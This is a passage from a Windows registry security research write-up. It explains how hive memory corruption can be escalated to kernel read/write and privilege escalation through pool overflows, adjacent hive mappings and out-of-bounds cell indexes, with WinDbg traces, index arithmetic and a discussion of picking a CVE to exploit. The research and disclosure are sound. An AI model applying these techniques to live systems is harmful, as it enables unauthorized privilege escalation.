    However, this is certainly not the only way to cause pool memory corruption by modifying the internal data of the regf format. Another idea would be, for example, to create a very long "big data" value in the hive (over ~16 KiB in a hive with version ≥ 1.4) and then cause _CM_KEY_VALUE.DataLength to be inconsistent with the _CM_BIG_DATA.Count field, which denotes the number of 16-kilobyte chunks in the backing buffer. If we look at the implementation of the internal CmpGetValueData function, it is easy to see that it allocates a paged pool buffer based on the former value, and then copies data to it based on the latter one. Therefore, if we set _CM_KEY_VALUE.DataLength to a number less than 16344 × (_CM_BIG_DATA.Count - 1), then the next time the value's data is requested, a linear pool buffer overflow will occur.
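The arithmetic behind this mismatch can be sketched as a simple model of the allocate-by-DataLength, copy-by-Count behavior described above (this is an illustrative calculation, not the actual kernel code):

```python
# Model of the CmpGetValueData inconsistency described above: the output
# buffer is sized from _CM_KEY_VALUE.DataLength, but the copy loop is driven
# by _CM_BIG_DATA.Count chunks of up to 16344 bytes each. When the two
# fields disagree, the copy overruns the allocation.
CHUNK = 16344  # usable bytes per big-data chunk (hive version >= 1.4)

def overflow_bytes(data_length, chunk_count):
    """How far a Count-driven copy runs past a DataLength-sized buffer."""
    # The first chunk_count - 1 chunks are copied in full, unconditionally.
    copied_full = CHUNK * (chunk_count - 1)
    return max(0, copied_full - data_length)

# Consistent value: 3 chunks backing ~40 KB of data -> no overflow.
assert overflow_bytes(40000, 3) == 0
# Corrupted hive: DataLength claims 1 KiB, but Count says 4 chunks -> the
# full-chunk copies alone write ~47 KiB past the 1 KiB buffer.
assert overflow_bytes(1024, 4) == CHUNK * 3 - 1024
```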

    This type of primitive is promising, as it opens the door to targeting a much wider range of objects in memory than was previously possible. The next step would likely involve finding a suitable object to place immediately after the overwritten buffer (e.g., pipe attributes, as mentioned in this article from 2020), and then corrupting it to achieve a more powerful primitive like arbitrary kernel read/write. In short, such an attack would boil down to a fairly generic exploitation of pool-based memory corruption, a topic widely discussed in existing resources. We won't explore this further here, and instead encourage interested readers to investigate it on their own.

    Inter-hive memory corruption

    So far in our analysis, we have assumed that with a hive-based memory corruption bug, we can only modify data within the specific hive we are operating on. In practice, however, this is not necessarily the case, because there might be other data located in the immediate vicinity of our bin's mapping in memory. If that happens, it might be possible to seamlessly cross the boundary between the original hive and some more interesting objects at higher memory addresses using a linear buffer overflow. In the following sections, we will look at two such scenarios: one where the mapping of the attacked hive is in the user-mode space of the "Registry" process, and one where it resides in the kernel address space.

    Other hive mappings in the user space of the Registry process

    Mapping the section views of hives in the user space of the Registry process is the default behavior for the vast majority of the registry. The layout of individual mappings in memory can be easily observed from WinDbg. To do this, find the Registry process (usually the second in the system process list), switch to its context, and then issue the !vad command. An example of performing these operations is shown below.

    0: kd> !process 0 0

    **** NT ACTIVE PROCESS DUMP ****

    PROCESS ffffa58fa069f040

        SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000

        DirBase: 001ae002  ObjectTable: ffffe102d72678c0  HandleCount: 3077.

        Image: System

    PROCESS ffffa58fa074a080

        SessionId: none  Cid: 007c    Peb: 00000000  ParentCid: 0004

        DirBase: 1025ae002  ObjectTable: ffffe102d72d1d00  HandleCount: <Data Not Accessible>

        Image: Registry

    [...]

    0: kd> .process ffffa58fa074a080

    Implicit process is now ffffa58f`a074a080

    WARNING: .cache forcedecodeuser is not enabled

    0: kd> !vad

    VAD             Level         Start             End              Commit

    ffffa58fa207f740  5        152e7a20        152e7a2f               0 Mapped       READONLY           \Windows\System32\config\SAM

    ffffa58fa207dbc0  4        152e7a30        152e7b2f               0 Mapped       READONLY           \Windows\System32\config\DEFAULT

    ffffa58fa207dc60  5        152e7b30        152e7b3f               0 Mapped       READONLY           \Windows\System32\config\SECURITY

    ffffa58fa207d940  3        152e7b40        152e7d3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa207dda0  5        152e7d40        152e7f3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    [...]

    ffffa58fa207e840  5        152ec940        152ecb3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa207b780  3        152ecb40        152ecd3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa0f98ba0  5        152ecd40        152ecd4f               0 Mapped       READONLY           \EFI\Microsoft\Boot\BCD

    ffffa58fa3af5440  4        152ecd50        152ecd8f               0 Mapped       READONLY           \Windows\ServiceProfiles\NetworkService\NTUSER.DAT

    ffffa58fa3bfe9c0  5        152ecd90        152ecdcf               0 Mapped       READONLY           \Windows\ServiceProfiles\LocalService\NTUSER.DAT

    ffffa58fa3ca3d20  1        152ecdd0        152ece4f               0 Mapped       READONLY           \Windows\System32\config\BBI

    ffffa58fa2102790  6        152ece50        152ecf4f               0 Mapped       READONLY           \Users\user\NTUSER.DAT

    ffffa58fa4145640  5        152ecf50        152ed14f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS

    ffffa58fa4145460  6        152ed150        152ed34f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS

    ffffa58fa412a520  4        152ed350        152ed44f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS

    ffffa58fa412c5a0  6        152ed450        152ed64f               0 Mapped       READONLY           \Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat

    ffffa58fa4e8bf60  5        152ed650        152ed84f               0 Mapped       READONLY           \Windows\appcompat\Programs\Amcache.hve

    In the listing above, the "Start" and "End" columns show the starting and ending addresses of each mapping divided by the page size, which is 4 KiB. In practice, this means that the SAM hive is mapped at 0x152e7a20000 – 0x152e7a2ffff, the DEFAULT hive is mapped at 0x152e7a30000 – 0x152e7b2ffff, and so on. We can immediately see that all the hives are located very close to each other, with practically no gaps in between them.
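The conversion from the page numbers printed by !vad to the virtual addresses quoted above is straightforward to verify:

```python
# The !vad output expresses mapping bounds in 4 KiB pages; multiplying by
# the page size recovers the virtual address range of each hive mapping.
PAGE = 0x1000

def vad_range(start_pfn, end_pfn):
    """Translate a !vad Start/End pair into an inclusive address range."""
    return (start_pfn * PAGE, (end_pfn + 1) * PAGE - 1)

# SAM hive row: Start 152e7a20, End 152e7a2f
assert vad_range(0x152e7a20, 0x152e7a2f) == (0x152e7a20000, 0x152e7a2ffff)
# DEFAULT hive row: Start 152e7a30, End 152e7b2f
assert vad_range(0x152e7a30, 0x152e7b2f) == (0x152e7a30000, 0x152e7b2ffff)
```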

    However, this example does not directly demonstrate whether it's possible to place, for instance, the mapping of the SOFTWARE hive directly after the mapping of an app hive loaded by a normal user. The addresses of the system hives appear to be already determined, and there isn't much space between them to inject our own data. Fortunately, hives can grow dynamically, especially when you start writing long values to them. This leads to the creation of new bins and mapping them at new addresses in the Registry process's memory.

    For testing purposes, I wrote a simple program that creates consecutive values of 0x3FD8 bytes within a given key. This triggers the allocation of new bins of exactly 0x4000 bytes: 0x3FD8 bytes of data plus 0x20 bytes for the _HBIN structure, 4 bytes for the cell size, and 4 bytes for padding. Next, I ran two instances of it in parallel on an app hive and HKLM\SOFTWARE, filling the former with the letter "A" and the latter with the letter "B". The result of the test was immediately visible in the memory layout:
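The size calculation above checks out directly; for reference, the same numbers also give the bin count per 2 MiB mapping:

```python
# Why a value of 0x3FD8 bytes yields bins of exactly 0x4000 (16 KiB): the
# data is preceded by the _HBIN header, the 4-byte cell size field, and
# 4 bytes of padding.
HBIN_HEADER = 0x20      # sizeof(_HBIN)
CELL_SIZE_FIELD = 4     # signed 32-bit size prefix of each cell
PADDING = 4
VALUE_DATA = 0x3FD8

BIN_SIZE = HBIN_HEADER + CELL_SIZE_FIELD + PADDING + VALUE_DATA
assert BIN_SIZE == 0x4000

# A 2 MiB mapping therefore holds 128 such bins.
assert 0x200000 // BIN_SIZE == 128
```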

    0: kd> !vad

    VAD             Level         Start             End              Commit

    ffffa58fa67b44c0  8        15280000        152801ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b5b40  7        15280200        152803ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b46a0  8        15280400        152805ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b6540  6        15280600        152807ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b5dc0  8        15280800        152809ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b4560  7        15280a00        15280bff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b6900  8        15280c00        15280dff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b5280  5        15280e00        15280fff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b5e60  8        15281000        152811ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b7800  7        15281200        152813ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b8de0  8        15281400        152815ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b8840  6        15281600        152817ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b8980  8        15281800        152819ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    [...]

    What we have here are interleaved mappings of trusted and untrusted hives, each 2 MiB in length and tightly packed with 128 bins of 16 KiB each. Importantly, there are no gaps between the end of one mapping and the start of another, which means that it is indeed possible to use memory corruption within one hive to influence the internal representation of another. Take, for example, the boundary between the test.dat and SOFTWARE hives at address 0x15280400000. If we dump the memory area encompassing a few dozen bytes before and after this page boundary, we get the following result:

    0: kd> db 0x15280400000-30

    00000152`803fffd0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

    00000152`803fffe0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

    00000152`803ffff0  41 41 41 41 41 41 41 41-41 41 41 41 00 00 00 00  AAAAAAAAAAAA....

    00000152`80400000  68 62 69 6e 00 f0 bf 0c-00 40 00 00 00 00 00 00  hbin.....@......

    00000152`80400010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

    00000152`80400020  20 c0 ff ff 42 42 42 42-42 42 42 42 42 42 42 42   ...BBBBBBBBBBBB

    00000152`80400030  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB

    00000152`80400040  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB

    We can clearly see that the bytes belonging to both hives in question exist within a single, continuous memory area. This, in turn, means that memory corruption could indeed spread from one hive into the other. However, to successfully achieve this result, one would also need to ensure that the specific fragment of the target hive is marked as dirty. Otherwise, this memory page would be marked as PAGE_READONLY, which would lead to a system crash when attempting to write data, despite both regions being directly adjacent to each other.

    After successfully corrupting data in a global, system hive, the remainder of the attack would likely involve either modifying a security descriptor to grant oneself write permissions to specific keys, or directly changing configuration data to enable the execution of one's own code with administrator privileges.

    Attacking adjacent memory in pool-based hive mappings

    Although hive file views are typically mapped in the user-mode space of the Registry process (which contains nothing else but these mappings), there are a few circumstances where this data is stored directly in kernel-mode pools. These cases are as follows:

    1. All volatile hives, which have no persistent representation as regf files on disk. Examples include the virtual hive rooted at \Registry, as well as the HKLM\HARDWARE hive.
    2. The entire HKLM\SYSTEM hive, including both its stable and volatile parts.
    3. All hives that have been recently created by calling one of the NtLoadKey* syscalls on a previously non-existent file, including newly created app hives.
    4. Volatile storage space of every active hive in the system.

    The first point is not useful to a potential attacker because these types of hives do not grant unprivileged users write permissions. The second and third points are also quite limited, as they could only be exploited through memory corruption that doesn't require binary control over the input hive. However, the fourth point makes it possible to exploit vulnerabilities in any hive in the system, including app hives. This is because creating volatile keys does not require any special permissions compared to regular keys. Additionally, if we have a memory corruption primitive within one storage type, we can easily influence data within the other. For example, in the case of stable storage memory corruption, it is enough to craft a value for which the cell index _CM_KEY_VALUE.Data has the highest bit set, and thus points to the volatile space. From this point, we can arbitrarily modify regf structures located in that space, and directly read/write out-of-bounds pool memory by setting a sufficiently long value size (exceeding the bounds of the given bin). Such a situation is shown in the diagram below:

    A diagram illustrating memory corruption, divided into two sections. The top section, labeled "Kernel-mode paged pool," shows a memory bar containing "test.dat (volatile)" followed by several "Pool chunk" blocks and a dotted "Pool chunks..." block. The pool chunks are shown being overflowed. The bottom section, labeled "Registry process address space," shows a memory bar with a small corrupted area at the beginning, followed by "test.dat (stable)" and a dotted "... Other hives ..." block. An arrow from a "Corrupted value node" label points to this corrupted area. A red arrow labeled "Volatile cell index" connects the "Pool corruption" in the kernel-mode paged pool to the "Corrupted value node" in the registry process address space, indicating a relationship between the two corrupted areas.

    This behavior can be further verified on a specific example. Let's consider the HKCU hive for a user logged into a Windows 11 system – it will typically have some data stored in the volatile storage due to the existence of the "HKCU\Volatile Environment" key. Let's first find the hive in WinDbg using the !reg hivelist command:

    0: kd> !reg hivelist

    ---------------------------------------------------------------------------------------------------------------------------------------------

    |     HiveAddr     |Stable Length|    Stable Map    |Volatile Length|    Volatile Map    |     BaseBlock     | FileName 

    ---------------------------------------------------------------------------------------------------------------------------------------------

    [...]

    | ffff82828fc1a000 |      ee000  | ffff82828fc1a128 |       5000    |  ffff82828fc1a3a0  | ffff82828f8cf000  | \??\C:\Users\user\ntuser.dat

    [...]

    As can be seen, the hive has a volatile space of 0x5000 bytes (5 memory pages). Let's try to find the second page of this hive region in memory by translating its corresponding cell index:

    0: kd> !reg cellindex ffff82828fc1a000 80001000

    Map = ffff82828fc1a3a0 Type = 1 Table = 0 Block = 1 Offset = 0

    MapTable     = ffff82828fe6a000 

    MapEntry     = ffff82828fe6a018 

    BinAddress = ffff82828f096009, BlockOffset = 0000000000000000

    BlockAddress = ffff82828f096000 

    pcell:  ffff82828f096004
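The decomposition performed by !reg cellindex can be reproduced by hand. A minimal Python sketch, assuming the publicly documented HCELL_INDEX layout (bit 31 selects the storage type, followed by a 10-bit table index, a 9-bit block index, and a 12-bit byte offset):

```python
# Decoding a cell index the same way !reg cellindex does, assuming the
# documented HCELL_INDEX bit layout: bit 31 = storage type (0 = stable,
# 1 = volatile), bits 30-21 = table index, bits 20-12 = block index,
# bits 11-0 = byte offset within the block.
def decode_cell_index(index):
    return {
        "type":   (index >> 31) & 0x1,
        "table":  (index >> 21) & 0x3FF,
        "block":  (index >> 12) & 0x1FF,
        "offset": index & 0xFFF,
    }

# The volatile cell index resolved above: 0x80001000.
assert decode_cell_index(0x80001000) == {
    "type": 1, "table": 0, "block": 1, "offset": 0,
}
# Any index with the top bit set refers to volatile storage.
assert decode_cell_index(0x80000000)["type"] == 1
```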

    It is a kernel-mode address, as expected. We can dump its contents to verify that it indeed contains registry data:

    0: kd> db ffff82828f096000

    ffff8282`8f096000  68 62 69 6e 00 10 00 00-00 10 00 00 00 00 00 00  hbin............

    ffff8282`8f096010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

    ffff8282`8f096020  38 ff ff ff 73 6b 00 00-20 10 00 80 20 10 00 80  8...sk.. ... ...

    ffff8282`8f096030  01 00 00 00 b0 00 00 00-01 00 04 88 98 00 00 00  ................

    ffff8282`8f096040  a4 00 00 00 00 00 00 00-14 00 00 00 02 00 84 00  ................

    ffff8282`8f096050  05 00 00 00 00 03 24 00-3f 00 0f 00 01 05 00 00  ......$.?.......

    ffff8282`8f096060  00 00 00 05 15 00 00 00-dc be 84 0b 6c 21 35 39  ............l!59

    ffff8282`8f096070  b9 d0 84 88 ea 03 00 00-00 03 14 00 3f 00 0f 00  ............?...

    Everything looks good. At the start of the page, there is a bin header, and at offset 0x20, we see the first cell corresponding to a security descriptor ('sk'). Now, let's see what the !pool command tells us about this address:

    0: kd> !pool ffff82828f096000

    Pool page ffff82828f096000 region is Paged pool

    *ffff82828f096000 : large page allocation, tag is CM16, size is 0x1000 bytes

                    Pooltag CM16 : Internal Configuration manager allocations, Binary : nt!cm

    We are dealing with a paged pool allocation of 0x1000 bytes requested by the Configuration Manager. And what is located right behind it?

    0: kd> !pool ffff82828f096000+1000

    Pool page ffff82828f097000 region is Paged pool

    *ffff82828f097000 : large page allocation, tag is Obtb, size is 0x1000 bytes

                    Pooltag Obtb : object tables via EX handle.c, Binary : nt!ob

    0: kd> !pool ffff82828f096000+2000

    Pool page ffff82828f098000 region is Paged pool

    *ffff82828f098000 : large page allocation, tag is Gpbm, size is 0x1000 bytes

                    Pooltag Gpbm : GDITAG_POOL_BITMAP_BITS, Binary : win32k.sys

    The next two memory pages correspond to other, completely unrelated allocations on the pool: one associated with the NT Object Manager, and the other with the win32k.sys graphics driver. This clearly demonstrates that in the kernel space, areas containing volatile hive data are mixed with various other allocations used by other parts of the system. Moreover, this technique is attractive because it not only enables out-of-bounds writes of controlled data, but also reads of the same OOB memory beforehand. Thanks to this, the exploit does not have to operate "blindly", but it can precisely verify whether the memory is arranged exactly as expected before proceeding with the next stage of the attack. With these kinds of capabilities, writing the rest of the exploit should be a matter of properly grooming the pool layout and finding some good candidate objects for corruption.

    The ultimate primitive: out-of-bounds cell indexes

    The situation is clearly not as hopeless as it might have seemed earlier, and there are quite a few ways to convert memory corruption in one's own hive space into taking control of other types of memory. All of them, however, have one minor flaw: they rely on prearranging a specific layout of objects in memory (e.g., hive mappings in the Registry process, or allocations on the paged pool), which means they cannot be said to be 100% stable or deterministic. The randomness of the memory layout carries the inherent risk that either the exploit simply won't work, or worse, it will crash the operating system in the process. For lack of better alternatives, these techniques would be sufficient, especially for demonstration purposes. However, I found a better method that guarantees 100% effectiveness by completely eliminating the element of randomness. I have hinted at or even directly mentioned this many times in previous blog posts in this series, and I am, of course, referring to out-of-bounds cell indexes.

    As a quick reminder, cell indexes are the hive's equivalent of pointers: they are 32-bit values that allow allocated cells to reference each other. The translation of cell indexes into their corresponding virtual addresses is achieved using a special 3-level structure called a cell map, which resembles a CPU page table:

    A diagram of a cell map

    The C-like pseudocode of the internal HvpGetCellPaged function responsible for performing the cell map walk is presented below:

    _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {

      _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map

                                ->Directory[(Index >> 21) & 0x3FF]

                                ->Table[(Index >> 12) & 0x1FF];

      return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4;

    }
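    To make the bit layout easier to follow, the extraction performed by HvpGetCellPaged can be mirrored with a minimal Python sketch (an illustrative helper, not part of any Windows source):

    ```python
    def decode_cell_index(index):
        """Split a 32-bit cell index into the four components used by
        HvpGetCellPaged: storage type, directory index, table index, offset."""
        storage = (index >> 31) & 0x1      # 0 = stable, 1 = volatile
        directory = (index >> 21) & 0x3FF  # 10-bit directory index
        table = (index >> 12) & 0x1FF      # 9-bit table index
        offset = index & 0xFFF             # 12-bit offset within the 4 KiB block
        return storage, directory, table, offset

    # The volatile cell index 0x80001000 from the earlier WinDbg session:
    print(decode_cell_index(0x80001000))  # (1, 0, 1, 0)
    ```

    The result matches the "Type = 1 Table = 0 Block = 1 Offset = 0" breakdown printed by the !reg cellindex command (WinDbg's "Table" and "Block" labels correspond to the directory and table indexes here).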

    The structures corresponding to the individual levels of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, and they are accessible through the _CMHIVE.Hive.Storage field. From an exploitation perspective, two facts are crucial here. First, the HvpGetCellPaged function does not perform any bounds checks on the input index. Second, for hives smaller than 2 MiB, Windows applies an additional optimization called "small dir". In that case, instead of allocating the entire Directory array of 1024 elements and only using one of them, the kernel sets the _CMHIVE.Hive.Storage[...].Map pointer to the address of the _CMHIVE.Hive.Storage[...].SmallDir field, which simulates a single-element array. In this way, the number of logical cell map levels remains the same, but the system uses one less pool allocation to store them, saving about 8 KiB of memory per hive. This behavior is shown in the screenshot below:

    Screenshot

    What we have here is a hive that has a stable storage area of 0xEE000 bytes (952 KiB) and a volatile storage area of 0x5000 bytes (20 KiB). Both of these sizes are smaller than 2 MiB, and consequently, the "small dir" optimization is applied in both cases. As a result, the Map pointers (marked in orange) point directly to the SmallDir fields (marked in green).

    This situation is interesting because if the kernel attempts to resolve an invalid cell index with a value of 0x200000 or greater (i.e., with the "Directory index" part being non-zero) in the context of such a hive, then the first step of the cell map walk will reference the out-of-bounds Guard, FreeDisplay, etc. fields as pointers. This situation is illustrated in the diagram below:

    Diagram described above

    In other words, by fully controlling the 32-bit value of the cell index, we can make the translation logic jump through two pointers fetched from out-of-bounds memory, and then add a controlled 12-bit offset to the result. An additional consideration is that in the first step, we reference OOB indexes of an "array" located inside the larger _CMHIVE structure, which always has the same layout on a given Windows build. Therefore, by choosing a directory index that references a specific pointer in _CMHIVE, we can be sure that it will always work the same way on a given version of the system, regardless of any random factors.

    On the other hand, a small inconvenience is that the _HMAP_ENTRY structure (i.e., the last level of the cell map) has the following layout:

    0: kd> dt _HMAP_ENTRY

    nt!_HMAP_ENTRY

       +0x000 BlockOffset      : Uint8B

       +0x008 PermanentBinAddress : Uint8B

       +0x010 MemAlloc         : Uint4B

    And the final returned value is the sum of the BlockOffset and PermanentBinAddress fields. Therefore, if one of these fields contains the address we want to reference, the other must be NULL, which may slightly narrow down our options.

    If we were to create a graphical representation of the relationships between structures based on the pointers they contain, starting from _CMHIVE, it would look something like the following:

    A diagram illustrating the relationships between various system components, with "CMHIVE" as the central element in a rectangular box. Several components interact directly with "CMHIVE": A box labeled "CM_KEY_SECURITY_CACHE_ENTRY" has an arrow pointing to "CMHIVE". A box labeled "CMP_VOLUME_CONTEXT" has a two-way arrow connecting it to "CMHIVE". A box labeled "CM_KEY_CONTROL_BLOCK" has a two-way arrow connecting it to "CMHIVE". A box labeled "CM_RM" has a two-way arrow connecting it to "CMHIVE". Other components are connected as follows: A box labeled "CM_KEY_SECURITY_CACHE" points to "CM_KEY_SECURITY_CACHE_ENTRY". A box labeled "FILE_OBJECT" points to "CMP_VOLUME_CONTEXT". A box labeled "CMP_VOLUME_MANAGER" has a two-way arrow with "CMP_VOLUME_CONTEXT". A box labeled "CM_NAME_CONTROL_BLOCK" has a two-way arrow with "CM_KEY_CONTROL_BLOCK". A box labeled "CM_KCB_LAYER_INFO" has a two-way arrow with "CM_KEY_CONTROL_BLOCK". "CM_KEY_CONTROL_BLOCK" points to boxes labeled "CM_KEY_BODY", "CM_TRANS", and "CM_KCB_UOW". A box labeled "KRESOURCEMANAGER" points to "CM_RM". A box labeled "KTM" points to "CM_RM".

    The diagram is not necessarily complete, but it shows an overview of some objects that can be reached from _CMHIVE with a maximum of two pointer dereferences. However, it is important to remember that not every edge in this graph will be traversable in practice. This is because of two reasons: first, due to the layout of the _HMAP_ENTRY structure (i.e. 0x18-byte alignment and the need for a 0x0 value being adjacent to the given pointer), and second, due to the fact that not every pointer in these objects is always initialized. For example, the _CMHIVE.RootKcb field is only valid for app hives (but not for normal hives), while _CMHIVE.CmRm is only set for standard hives, as app hives never have KTM transaction support enabled. So, the idea provides some good foundation for our exploit, but it does require additional experimentation to get every technical detail right.

    Moving on, the !reg cellindex command in WinDbg is perfect for testing out-of-bounds cell indexes, because it uses the exact same cell map walk logic as HvpGetCellPaged, and it doesn't perform any additional bounds checks either. So, let's stick with the HKCU hive we were working with earlier, and try to create a cell index that points back to its _CMHIVE structure. We'll use the _CMHIVE → _CM_RM → _CMHIVE path for this. The first decision we need to make is to choose the storage type for this index: stable (0) or volatile (1). In the case of HKCU, both storage types are non-empty and use the "small dir" optimization, so we can choose either one; let's say volatile. Next, we need to calculate the directory index, which will be equal to the difference between the offsets of the _CMHIVE.CmRm and _CMHIVE.Hive.Storage[1].SmallDir fields:

    0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir)

    (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) : 0xffff82828fc1a3a0 [Type: _HMAP_TABLE * *]

        0xffff82828fe6a000 [Type: _HMAP_TABLE *]

    0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm)

    (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm)                     : 0xffff82828fc1b038 [Type: _CM_RM * *]

        0xffff82828fdcc8e0 [Type: _CM_RM *]

    In this case, it is (0xffff82828fc1b038 - 0xffff82828fc1a3a0) ÷ 8 = 0x193. The next step is to calculate the table index, which will be the offset of the _CM_RM.CmHive field from the beginning of the structure, divided by the size of _HMAP_ENTRY (0x18).

    0: kd> dx (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive)

    (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive)                 : 0xffff82828fdcc930 [Type: _CMHIVE * *]

        0xffff82828fc1a000 [Type: _CMHIVE *]

    So, the calculation is (0xffff82828fdcc930 - 0xffff82828fdcc8e0) ÷ 0x18 = 3. Next, we can verify where the CmHive pointer falls within the _HMAP_ENTRY structure.

    0: kd> dt _HMAP_ENTRY 0xffff82828fdcc8e0+3*0x18

    nt!_HMAP_ENTRY

       +0x000 BlockOffset      : 0

       +0x008 PermanentBinAddress : 0xffff8282`8fc1a000

       +0x010 MemAlloc         : 0

    The _CM_RM.CmHive pointer aligns with the PermanentBinAddress field, which is good news. Additionally, the BlockOffset field is zero, which is also desirable. Internally, it corresponds to the ContainerSize field, which is zeroed out if no KTM transactions have been performed on the hive during this session – this will suffice for our example.
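    The index arithmetic from the last few steps can be double-checked in Python, simply reproducing the calculations above with the addresses from this particular WinDbg session:

    ```python
    # Addresses taken from the WinDbg session above (they will differ per boot).
    SMALLDIR_ADDR = 0xffff82828fc1a3a0  # &_CMHIVE.Hive.Storage[1].SmallDir
    CMRM_FIELD    = 0xffff82828fc1b038  # &_CMHIVE.CmRm
    CM_RM_BASE    = 0xffff82828fdcc8e0  # the _CM_RM object itself
    CMHIVE_FIELD  = 0xffff82828fdcc930  # &_CM_RM.CmHive

    # Directory index: pointer-sized (8-byte) slots between SmallDir and CmRm.
    directory = (CMRM_FIELD - SMALLDIR_ADDR) // 8
    assert directory == 0x193

    # Table index: which 0x18-byte _HMAP_ENTRY the CmHive pointer falls into.
    # A remainder of 8 means it lands on the PermanentBinAddress field.
    table, remainder = divmod(CMHIVE_FIELD - CM_RM_BASE, 0x18)
    assert (table, remainder) == (3, 8)
    ```

    The remainder of 8 confirms the alignment seen in the dt output: the pointer overlaps PermanentBinAddress rather than BlockOffset.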

    We have now calculated three of the four cell index elements, and the last one is the offset, which we will set to zero, as we want to access the _CMHIVE structure from the very beginning. It is time to gather all this information in one place; we can build the final cell index using a simple Python function:

    >>> def MakeCellIndex(storage, directory, table, offset):

    ...     print("0x%x" % ((storage << 31) | (directory << 21) | (table << 12) | offset))

    ...

    And then pass the values we have established so far:

    >>> MakeCellIndex(1, 0x193, 3, 0)

    0xb2603000

    >>>

    So the final out-of-bounds cell index pointing to the _CMHIVE structure of a given hive is 0xB2603000. It is now time to verify in WinDbg whether this magic index actually works as intended.

    0: kd> !reg cellindex ffff82828fc1a000 b2603000

    Map = ffff82828fc1a3a0 Type = 1 Table = 193 Block = 3 Offset = 0

    MapTable     = ffff82828fdcc8e0 

    MapEntry     = ffff82828fdcc928 

    BinAddress = ffff82828fc1a000, BlockOffset = 0000000000000000

    BlockAddress = ffff82828fc1a000 

    pcell:  ffff82828fc1a004

    Indeed, the _CMHIVE address passed as the input of the command was also printed in its output, which means that our technique works (the extra 0x4 in the output address is there to account for the cell size). If we were to insert this index into the _CM_KEY_VALUE.Data field, we would gain the ability to read from and write to the _CMHIVE structure in kernel memory through the registry value. This represents a very powerful capability in the hands of a local attacker.

    Writing the exploit

    At this stage, we already have a solid plan for how to leverage the initial primitive of hive memory corruption for further privilege escalation. It's time to choose a specific vulnerability and begin writing an actual exploit for it. This process is described in detail below.

    Step 0: Choosing the vulnerability

    Faced with approximately 17 vulnerabilities related to hive memory corruption, the immediate challenge is selecting one for a demonstration exploit. While any of these bugs could eventually be exploited with time and experimentation, they vary in difficulty. There is also an aesthetic consideration: for demonstration purposes, it would be ideal if the exploit's actions were visible within Regedit, which narrows our options. Nevertheless, with a significant selection still available, we should be able to identify a suitable candidate. Let's briefly examine two distinct possibilities.

    CVE-2022-34707

    The first vulnerability that always comes to my mind in the context of the registry is CVE-2022-34707. This is partly because it was the first bug I manually discovered as part of this research, but mainly because it is incredibly convenient to exploit. The essence of this bug is that it was possible to load a hive with a security descriptor containing a refcount very close to the maximum 32-bit value (e.g., 0xFFFFFFFF), and then overflow it by creating a few more keys that used it. This resulted in a very powerful UAF primitive, as the incorrectly freed cell could be subsequently filled with new objects and then freed again any number of times. In this way, it was possible to achieve type confusion of several different types of objects, e.g., by reusing the same cell subsequently as a security descriptor → value node → value data backing cell, we could easily gain control over the _CM_KEY_VALUE structure, allowing us to continue the attack using out-of-bounds cell indexes.
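    The overflow itself is plain 32-bit modular arithmetic; a tiny sketch with illustrative values shows how a near-maximal refcount wraps around:

    ```python
    REFCOUNT_MAX = 0xFFFFFFFF  # the security descriptor refcount is a 32-bit field

    refcount = REFCOUNT_MAX             # value smuggled in via the crafted regf file
    refcount = (refcount + 1) & 0xFFFFFFFF  # one more key referencing the descriptor
    # The refcount wraps to 0, so the still-referenced cell is freed.
    print(refcount)  # 0
    ```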

    Due to its characteristics, this bug was also the first vulnerability in this research for which I wrote a full-fledged exploit. Many of the techniques I describe here were discovered while working on this bug. Furthermore, the screenshot showing the privilege escalation at the end of blog post #1 illustrates the successful exploitation of CVE-2022-34707. However, in the context of this blog post, it has one fundamental flaw: to set the initial refcount to a value close to overflowing the 32-bit range, it is necessary to manually craft the input regf file. This means that the target can only be an app hive, and thus we wouldn't be able to directly observe the exploitation in the Registry Editor. This would greatly reduce my ability to visually demonstrate the exploit, which is what ultimately led me to look for a better bug.

    CVE-2023-23420

